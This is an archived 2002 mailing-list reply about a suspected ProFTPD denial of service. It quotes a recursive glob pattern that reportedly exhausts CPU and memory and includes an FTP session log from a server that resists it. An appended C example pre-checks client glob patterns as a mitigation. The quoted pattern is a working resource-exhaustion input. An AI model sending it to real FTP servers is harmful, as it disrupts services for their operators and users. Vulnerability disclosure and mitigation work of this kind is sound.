Vulnerability Development mailing list archives
Re: proftp DoS in debian stable?
From: Felipe Franciosi <franciozzy () terra com br>
Date: Tue, 05 Mar 2002 13:32:14 -0300
`ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*` results in 100% of the CPU and memory resources being consumed. Can anyone confirm the same behaviour on their system?
Slackware 8.0 with kernel 2.2.19 and proftpd 1.2.4 running through inetd says the following:

```
root@stonehenge:~# ftp 0
Connected to 0.
220 ProFTPD 1.2.4 Server (Paradoxo Networking) [stonehenge.paradoxo.org]
Name (0:ozzy): pp0010
331 Password required for pp0010.
Password:
230 Anonymous access granted, restrictions apply.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp> quit
221 Goodbye.
```

And nothing happens.

Best Regards,
Felipe

--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Felipe Franciosi paradoxo networking
felipe () paradoxo org Brazil
http://www.paradoxo.org Porto Alegre - RS
Phone: (55)(51) 9806 7387 UIN - 33596050
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
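The pattern in this thread is expensive because every wildcard path component multiplies the number of candidate matches. The following is an added example, not code from the post or from ProFTPD: a pre-check a server could run on a client-supplied pattern before calling glob(). The function names, the per-directory fanout and the thresholds are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Pattern quoted in the thread, used here as sample input. */
static const char THREAD_PATTERN[] =
    "*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*";

/* Count path components containing a glob metacharacter. */
static size_t wildcard_components(const char *pattern)
{
    size_t count = 0;
    int has_meta = 0;
    for (const char *p = pattern; ; p++) {
        if (*p == '/' || *p == '\0') {
            count += has_meta ? 1 : 0;
            has_meta = 0;
            if (*p == '\0') break;
        } else if (*p == '*' || *p == '?' || *p == '[') {
            has_meta = 1;
        }
    }
    return count;
}

/* Worst-case match count, fanout^k for k wildcard components,
 * saturating at cap so the multiplication cannot overflow. */
static unsigned long estimated_matches(const char *pattern,
                                       unsigned long fanout, unsigned long cap)
{
    unsigned long total = 1;
    size_t k = wildcard_components(pattern);
    for (size_t i = 0; i < k; i++) {
        if (fanout != 0 && total > cap / fanout) return cap;
        total *= fanout;
    }
    return total < cap ? total : cap;
}

/* Returns 1 if the pattern may be expanded, 0 if it must be refused. */
static int glob_pattern_allowed(const char *pattern, size_t max_wild,
                                unsigned long fanout, unsigned long max_matches)
{
    if (wildcard_components(pattern) > max_wild) return 0;
    return estimated_matches(pattern, fanout, max_matches) < max_matches;
}

int main(void)
{
    printf("allowed=%d\n", glob_pattern_allowed(THREAD_PATTERN, 4, 10, 100000));
    return 0;
}
```

Refusing the pattern up front keeps the cost constant, whereas relying on the glob to fail with an out-of-memory error means the resources are already spent when the limit is reached.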